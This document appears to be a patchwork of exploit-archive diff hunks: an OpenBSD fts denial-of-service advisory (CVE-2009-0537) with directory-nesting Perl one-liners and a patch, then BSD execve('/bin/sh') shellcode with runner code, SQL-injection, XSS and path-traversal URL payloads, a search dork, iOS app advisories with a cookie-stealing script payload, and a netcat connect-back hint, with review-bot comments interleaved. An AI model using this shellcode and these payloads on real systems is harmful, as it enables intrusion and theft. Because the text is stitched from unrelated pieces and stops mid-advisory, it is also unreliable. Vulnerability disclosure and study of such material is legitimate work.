CVE: CVE-2009-0537
We are going informing all vendors, about this problem.
Affected Software (official):
- - OpenBSD 4.4
/usr/src/lib/libc/gen/fts.c
- - Microsoft Interix
6.0 10.0.6030.0 x86
- - Microsft Vista Enterprise
SearchIndexer.exe
probably more...
Original URL:
http://securityreason.com/achievement_securityalert/60
- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies.
The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions.
The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy.
The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy.
typedef struct _ftsent {
unsigned short fts_info; /* flags for FTSENT structure */
char *fts_accpath; /* access path */
char *fts_path; /* root path */
size_t fts_pathlen; /* strlen(fts_path) */
char *fts_name; /* file name */
size_t fts_namelen; /* strlen(fts_name) */
short fts_level; /* depth (-1 to N) */
int fts_errno; /* file errno */
long fts_number; /* local numeric value */
void *fts_pointer; /* local address value */
struct _ftsent *fts_parent; /* parent directory */
struct _ftsent *fts_link; /* next file structure */
struct _ftsent *fts_cycle; /* cycle structure */
struct stat *fts_statp; /* stat(2) information */
} FTSENT;
- --- 1. libc:fts_*():multiple vendors, Denial-of-service ---
The main problem exist in fts_level from ftsent structure. Type of fts_level is short.
let's see /usr/src/lib/libc/gen/fts.c (OpenBSD)
- ---line-616-625---
/*
* Figure out the max file name length that can be stored in the
* current path -- the inner loop allocates more path as necessary.
* We really wouldn't have to do the maxlen calculations here, we
* could do them in fts_read before returning the path, but it's a
* lot easier here since the length is part of the dirent structure.
*
* If not changing directories set a pointer so that can just append
* each new name into the path.
*/
- ---line-616-625---
"We really wouldn't have to do the maxlen calculations here..."
This is where a check on the level or the path length should be. Should.
short fts_level; /* depth (-1 to N) */
fts_level is a short, not aleph-null: the depth it can hold is finite.
- ---line-247-249---
#define NAPPEND(p) \
(p->fts_path[p->fts_pathlen - 1] == '/' \
? p->fts_pathlen - 1 : p->fts_pathlen)
- ---line-247-249---
This macro will crash when it accesses memory that was not correctly allocated.
So, what is wrong:
127# pwd
/home/cxib
127# du /home/
4 /home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)
127# gdb -q du
(no debugging symbols found)
(gdb) r /home/
Starting program: /usr/bin/du /home/
4 /home/cxib/.ssh
Program received signal SIGSEGV, Segmentation fault.
0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385
385 name: t = sp->fts_path + NAPPEND(p->fts_parent);
(gdb) print p->fts_level
$1 = -19001
(gdb) print p->fts_path
$2 = 0x837c9000 <Address 0x837c9000 out of bounds>
And we have the answer.
127# cd /home/cxib
127# mkdir len
127# cd len
127# mkdir 24
127# mkdir 23
127# mkdir 22
127# cd 22
127# perl -e '$a="C"x22;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../23/
127# perl -e '$a="C"x23;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../24/
127# perl -e '$a="C"x24;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
/* Output is printed correctly */
In all cases, the function should fail with the error ENAMETOOLONG.
The security consequences follow from the crash of the program: every construct like "while (fts_read())", and the ftw() function, constitutes a potential risk.
Examples of vulnerable programs:
du
rm
chmod -R
chgrp -R
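To make the wrap concrete, here is an added example (not code from the advisory or from OpenBSD libc) that models the fts_level counter as a short, once without and once with the guard from the fix; the 46535-deep walk reproduces the -19001 printed by gdb above.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example, not code from the advisory or from OpenBSD libc. It models
 * only the depth counter: FTSENT.fts_level is a `short`, and fts_build()
 * derives the child level from the parent's with `level = cur->fts_level + 1`.
 */

/* Unchecked descent, as before the fix. The addition happens in int, so it
 * never overflows there; the damage is done when the value is stored back into
 * a short: SHRT_MAX + 1 becomes SHRT_MIN on every two's-complement platform. */
static short descend_unchecked(short cur_level)
{
    int level = cur_level + 1;
    return (short)level;      /* out-of-range conversion: wraps negative */
}

/* Checked descent mirroring the guard in the fix: refuse to descend past
 * SHRT_MAX and report ENAMETOOLONG, the error the advisory says fts should
 * return instead of walking on with a corrupt level. */
static int descend_checked(short cur_level, short *next)
{
    if (cur_level == SHRT_MAX) {
        errno = ENAMETOOLONG;
        return -1;
    }
    *next = (short)(cur_level + 1);
    return 0;
}

/* Walk `depth` directories below the starting path (level 0) the way the
 * unchecked code tracks it, and return the stored level. A negative result is
 * the wrapped counter; with depth 46535 it reproduces the -19001 that gdb
 * printed in the advisory's crash. */
int simulate_unchecked(long depth)
{
    short level = 0;
    for (long i = 0; i < depth; i++)
        level = descend_unchecked(level);
    return level;
}

/* Same walk with the guard: returns the deepest level reached, or -1 with
 * errno set to ENAMETOOLONG once the tree is deeper than SHRT_MAX levels. */
long simulate_checked(long depth)
{
    short level = 0;
    for (long i = 0; i < depth; i++) {
        if (descend_checked(level, &level) != 0)
            return -1;
    }
    return level;
}

int main(void)
{
    printf("unchecked, depth 32768: fts_level = %d\n", simulate_unchecked(32768));
    printf("unchecked, depth 46535: fts_level = %d\n", simulate_unchecked(46535));
    printf("checked,   depth 32767: level = %ld\n", simulate_checked(32767));
    long r = simulate_checked(32768);
    if (r < 0)
        printf("checked,   depth 32768: error %s\n", strerror(errno));
    return 0;
}
```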
In the case of Microsoft Interix, the situation is very similar.
% uname -a
Interix cxib-PC 6.0 10.0.6030.0 x86 Intel_x86_Family6_Model123_Stepping6
% du pa
Segmentation fault
Vista Enterprise does not allow a name that long to be created; at the same time, it has great problems operating on such nodes.
Using the Interix subsystem, you can create such a deep tree on an NTFS partition.
example:
fts_level -10000
Afterwards, nothing more can be done with the malformed directory from the Windows API.
If you try to change permissions or copy the directory, you will run into a lot of bugs (stack overflow etc.).
SearchIndexer.exe will crash many times:
- ---
Faulting application SearchIndexer.exe, version 7.0.6001.16503, time
stamp 0x483b99af, faulting module msvcrt.dll, version 7.0.6001.18000,
time stamp 0x4791a727, exception code 0x40000015, fault offset
0x00053adb, process id 0x364, application start time 0x01c99276bd383759.
- ---
In some cases it is possible to lock the service permanently.
Interesting behaviour can be seen in this example:
C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\Not_existed_node\
(try pasting this path into Explorer)
where
C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\
of course exists
We do not see the potential risk, but the algorithm should be changed.
We are publishing this note because the vulnerability was only tested on OpenBSD. Many other systems react strangely to such testing.
- --- 2. Fix ---
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c
Fix by Otto Moerbeek:
Index: fts.c
===================================================================
RCS file: /cvs/src/lib/libc/gen/fts.c,v
retrieving revision 1.41
diff -u -p -r1.41 fts.c
- --- fts.c 27 Dec 2008 12:30:13 -0000 1.41
+++ fts.c 10 Feb 2009 09:00:24 -0000
@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type)
len++;
maxlen = sp->fts_pathlen - len;
+ if (cur->fts_level == SHRT_MAX) {
+ (void)closedir(dirp);
+ cur->fts_info = FTS_ERR;
+ SET(FTS_STOP);
+ errno = ENAMETOOLONG;
+ return (NULL);
+ }
+
level = cur->fts_level + 1;
/* Read the directory, attaching each entry to the `link' pointer. */
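Review bot: the new check compares `cur->fts_level == SHRT_MAX`, which needs <limits.h>; the hunk adds no include, so confirm fts.c already has it. The placement is right: the check runs before `level = cur->fts_level + 1;`, so the short fts_level can never be driven past its maximum into the negative values the advisory shows (-19001), and because `dirp` is already open at this point the `(void)closedir(dirp);` on the error path is required, not optional. `==` rather than `>=` is sufficient since the level only ever advances by one. One style point: a short comment above the `if` explaining why SHRT_MAX is the bound would help the next reader, because the `short fts_level` declaration lives in the FTSENT header, not in this file.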
- --- 3. Greets ---
Many thanks to Otto Moerbeek and all OpenBSD devs.
sp3x Infospec schain Chujwamwdupe p_e_a pi3
- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)
iEYEARECAAYFAkmu7s4ACgkQpiCeOKaYa9ZEjgCg1v0YJVH7nAWmsBnD0szmxY2Q
07cAoMd+Mh8AWxuipuOTVAtBCRmNJVob
=tXhh
-----END PGP SIGNATURE-----
# milw0rm.com [2009-03-05]
@ -1,29 +0,0 @@
/*
*BSD version
FreeBSD, OpenBSD, NetBSD.
s0t4ipv6@shellcode.com.ar
57 bytes.
-Encriptado execve(/bin/sh);
Para mas informacion ver
http://www.shellcode.com.ar/es/proyectos.html
*/
char shellcode[]=
"\xeb\x1b\x5e\x31\xc0\x6a\x1a\x6a\x17\x59\x49\x5b\x8a\x04\x0e"
"\xf6\xd3\x30\xd8\x88\x04\x0e\x50\x85\xc9\x75\xef\xeb\x05\xe8"
"\xe0\xff\xff\xff\x0e\x6f\xc7\xf9\xbe\xa3\xe4\xff\xb8\xff\xb2"
"\xf4\x1f\x95\x4c\xfb\xf8\xfc\x1f\x74\x09\xb2\x65";
main()
{
int *ret;
printf("Shellcode lenght=%d\n",sizeof(shellcode));
ret=(int*)&ret+2;
(*ret)=(int)shellcode;
}
// milw0rm.com [2004-09-26]

@ -1,12 +0,0 @@
/*
* BSDi
* execve() of /bin/sh by v9 (v9@fakehalo.org)
*/
static char exec[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */
"\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */
"\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */
"\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */
# milw0rm.com [2004-09-26]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24528/info
FuseTalk is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
NOTE: Specific vulnerable versions were not disclosed. Reports also indicate that this issue has been addressed in the latest version of the application.
http://www.example.com/forum/include/error/autherror.cfm?FTVAR_URLP=x&errorcode=[SQL_INJ]

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24563/info
FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/forum/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss]

@ -95,6 +95,6 @@ if (!$s0ck3t) {
}
fclose($s0ck3t);
}
?>
# milw0rm.com [2005-05-20]
?>
# milw0rm.com [2005-05-20]
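Review bot: the only lines in this hunk are `?>` and `# milw0rm.com [2005-05-20]`, each shown as removed and re-added with identical text, so the change is whitespace or line endings only (CRLF to LF or a trailing newline); verify with `git diff -w` that nothing else moved and say so in the commit message, because a silent EOL normalization across an archive makes later blame and bisect noisy.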

@ -64,6 +64,6 @@ print "\n\n$$$ OK -- Now Try: Nc -v www.host.com 4444 $$$\n";
print "$$ if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP $$\n";
### EOF ###
# milw0rm.com [2005-05-20]
# milw0rm.com [2005-05-20]
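Review bot: the footer `# milw0rm.com [2005-05-20]` is removed and re-added with identical text, so this is a whitespace or line-ending change only; if the whole commit is such a normalization, a single `git diff --ignore-space-at-eol` pass is the efficient way to confirm that no payload lines changed.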

platforms/cgi/webapps/30156.txt Executable file
@ -0,0 +1,17 @@
# Exploit Title: CGILua SQL Injection
# Google Dork: inurl:/cgilua.exe/sys/
# Vendor Homepage: https://web.tecgraf.puc-rio.br/cgilua/
# Version: < = 3.0
# Date: 09/12/2013
# Exploit Author: aceeeeeeeer
# Contact: http://www.twitter.com/aceeeeeeeer
# Tested on: Windows
####################################################################################
greetz: CrazyDuck - Synchr0N1ze - No\one - Kouback_TR_ - unknow_antisec -
elCorpse
Clandestine - MentorSec - Titio Vamp - LLL - Slayer Owner - masoqfellipe
####################################################################################
Exploit: /cgi/cgilua.exe/sys/start.htm?sid=[ SQLi ]
Demo: http://www.server.com/publique/cgi/cgilua.exe/sys/start.htm?sid=157
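Review bot: the `Demo:` line points at `http://www.server.com/publique/cgi/cgilua.exe/sys/start.htm?sid=157`, a host that looks live rather than the `www.example.com` placeholder used by the other entries in this commit; normalize it to example.com so the archive does not direct readers at a third party. Also `Version: < = 3.0` should read `<= 3.0`.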

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24516/info
WebIf is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
http://www.example.com/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue

@ -21,6 +21,6 @@ char fbsd_execve[]=
int main() {
void (*run)()=(void *)fbsd_execve;
printf("%d bytes \n",strlen(fbsd_execve));
}
}
// milw0rm.com [2004-09-26]
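Review bot: the closing `}` of `main()` is removed and re-added unchanged, so this hunk is whitespace-only; the surrounding context has a pre-existing format bug, `printf("%d bytes \n",strlen(fbsd_execve))` passes a `size_t` to `%d` and should use `%zu`, but that line is unchanged here and belongs in a separate fix.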

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24388/info
Packeteer PacketShaper is prone to a remote denial-of-service vulnerability because the application's web interface fails to properly handle unexpected requests.
Successfully exploiting this issue allows remote, authenticated attackers to reboot affected devices, denying service to legitimate users.
PacketShaper 7.3.0g2 and 7.5.0g1 are vulnerable to this issue; other versions may also be affected.
http://www.example.com/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE=

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24374/info
OfficeConnect Secure Router is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
This issue affects OfficeConnect Secure Router firmware 1.04-168; other versions may also be affected.
http://example.com/cgi-bin/admin?page=1&tk=>[xss]

@ -1,191 +0,0 @@
Document Title:
===============
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1152
Release Date:
=============
2013-12-04
Vulnerability Laboratory ID (VL-ID):
====================================
1152
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos
between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone,
from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your
devices under the same Wi-Fi network.
(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2012-11-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wireless Transfer App COM
Product: Wireless Transfer App 3.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected
command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Wireless Transfer App v3.7
Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album
Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low
user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the wireless transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
4. Switch back to the installed wireless transfer app and start the wifi transfer
5. Open the local web-server url http://localhost:6688/ (default link)
6. The local path/command execute occurs in the album name value of the photoGallery_head class
7. Successful reproduce of the vulnerability!
PoC: Album Name - photoGallery_head in the Album Sub Category List
<div class="header">
<div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
<div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
<div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
<div class="photoGallery_head">
<div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
<div class="phga_hd_right">
<input value="Zur?ck zur Sammlung" class="back" type="button">
</div>
</div>
</div>
PoC: Album Name - photoalbum in the Album Index List
<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
<dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl>
<dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
<img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl>
<dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
<img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl>
Reference(s):
http://localhost:6688/index.html
http://localhost:6688/albumhtm
http://localhost:6688/albumhtm?id=
http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable album name value.
Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
Security Risk:
==============
The security risk of the local command/path inject web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
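Review bot: the removed file carries mis-encoded characters (`Zur?ck zur Sammlung`, `Copyright ?`) and an internal date conflict (Release Date 2013-12-04 against a disclosure timeline entry of 2012-11-30); if this deletion is one half of a move, the copy at the new path should carry those fixes, since as a plain deletion it drops advisory VL-ID 1152 from the archive with no replacement visible in this hunk.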

@ -0,0 +1,218 @@
Document Title:
===============
Feetan Inc WireShare v1.9.1 iOS - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1157
Release Date:
=============
2013-12-05
Vulnerability Laboratory ID (VL-ID):
====================================
1157
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
WireShare supports more than 30 different file formats, including PDF, EPUB, TXT, CHM,PNG,MP3, RMVB and AVI.
Youre able to import files via EMAIL,Wi-Fi, iTunes File Sharing, the built-in browser, and Dropbox, Box,
SkyDrive, Google Drive and SugarSync.... Files can be arranged in folders, copied, renamed, zipped, and
viewed. You can view the document, read novels, listen to music, view photos, play video, annotate PDF
and share files in WireShare.
(Copy of the Homepage: https://itunes.apple.com/de/app/wireshare-share-files-your/id527465632 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities
in the Feetan Inc WireShare (Share files with your friends) mobile application v1.9.1 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the WireShare v1.9.1 for apple iOS.
A persistent input validation web vulnerability allows remote attackers to inject own malicious script codes on the
application-side (persistent) of the affected application web-server.
The vulnerability is located in the add `New Folder` input field. The vulnerability allows remote attackers to inject
own malicious script codes on the application-side of the index path/folder listing. The script code execute occurs
in the index path/folder listing with the vulnerable foldername parameter. The inject can be done local by the device
via add folder function or by remote inject via web-interface. The second execute occurs when the user is requesting
to delete the malicious injected script code entry of the folder list. The security risk of the persistent input
validation web vulnerability in the foldername value is estimated as high(-) with a cvss (common vulnerability scoring
system) count of 6.4(+)|(-)6.5.
Exploitation of the persistent script code inject vulnerability via POST method request requires low user interaction
and no privileged web-interface user account. In the default settings is auth of the web-server deactivated and blank.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] New Folder (fileListContainer)
Vulnerable Module(s):
[+] folder [name value] (targetItem)
Affected Module(s):
[+] Folder Index List
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with physical device access or
by remote attackers without privileged application user account and low user interaction. For security demonstration
or to reproduce the vulnerability follow the information and steps below.
PoC: Folder Index List - Index
<dt class="tthread">
<p class="hi"></p>
<p class="hn"><b>Name</b></p>
<p class="hs"><b>Size</b></p>
<p class="he"><b>Operation</b></p>
</dt>
<div style="background-image: url("/root/bg_file_list.jpg"); min-height:575px; margin-top: 93px;" id="fileListContainer">
<dd>
<p class="n">
<a href="http://localost:8080/New%20Folder%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E">
<img src="WireShare_files/icon_folder.png" height="30" width="40"></a>
</p>
<p class="p">
<a href="http://localhost:8080/New%20Folder%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E">New Folder <[PERSISTENT INJECTED SCRIPT CODE!].x"></a>
</p>
PoC: Folder Index List - Index
<div style="opacity: 0.5; height: 520px; width: 1349px; position: fixed; left: 0px; top: 0px;
z-index: 1001;" class="simplemodal-overlay" id="simplemodal-overlay"></div><div style="position: fixed;
z-index: 1002; height: 166px; width: 280px; left: 521.5px; top: 176px;" class="simplemodal-container"
id="simplemodal-container"><input class="simplemodal-close" name="cancelButton" id="cancelButton" value="" type="button">
<div style="height: 100%; outline: 0px none; width: 100%; overflow: auto;" class="simplemodal-wrap" tabindex="-1">
<div style="display: block;" class="simplemodal-data" id="modal-content">
<div id="modal-title"><h3>Delete File or Folder</h3></div>
<div id="modal-text"><a>Are you sure to delete it?
</a></div>
<form name="input" action="" method="post">
<div style="display: none;" id="modal-field"><input value="delete" name="operationType" type="hidden">
<input value="[PERSISTENT INJECTED SCRIPT CODE!]" name="originalItem" type="hidden"></div>
<input value="hello this is a test folder" name="ID" id="ID" class="inputone" type="hidden">
<input style="margin: 44px 4px 5px 3px;" value="" name="submitButton" id="submitButton" type="submit">
</form>
</div></div></div></body></html>
--- PoC Session Request Logs [POST] ---
Status: 200[OK]
POST http://192.168.2.106:8080/#
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[-1]
Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Connection[keep-alive]
Post Data:
targetItem[%2520%26%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.vulnerability-lab.com+onload%3Dalert%28document.cookie%29+%3C]
operationType[create]
ID[0]
submitButton[]
Response Headers:
Transfer-Encoding[chunked]
Accept-Ranges[bytes]
Date[Sun, 01 Dec 2013 22:17:30 GMT]
Solution - Fix & Patch:
=======================
The persistent input validation web vulnerability can be patched by a secure encode of the new folder name input field.
Encode and filter also the folder name output list were the malicious context execute has been occured.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
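Review bot: the fix in the Solution section ("a secure encode of the new folder name input field") names the wrong layer. The Post Data shows the payload arriving URL-encoded in targetItem with operationType=create, and the response form shows the same string later written back into the page unescaped as the value of the hidden originalItem input; the script runs when the folder name is rendered, not when it is submitted, so the primary control is HTML entity encoding of the folder name at every point it is written into the listing (attribute and element contexts alike), with an allow-list on accepted folder-name characters as the secondary control. The sentence "Encode and filter also the folder name output list were the malicious context execute has been occured" should read "Also encode the folder name in the output listing where the injected content executes."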


@ -0,0 +1,297 @@
Document Title:
===============
Print n Share v5.5 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1154
Release Date:
=============
2013-12-06
Vulnerability Laboratory ID (VL-ID):
====================================
1154
Common Vulnerability Scoring System:
====================================
9.2
Product & Service Introduction:
===============================
Print directly to the widest range of network or WiFi printers, without a computer or AirPrint! Alternatively print
via your Mac/PC to ALL printers including USB & Bluetooth printers. Print... documents cloud files,web pages,emails,
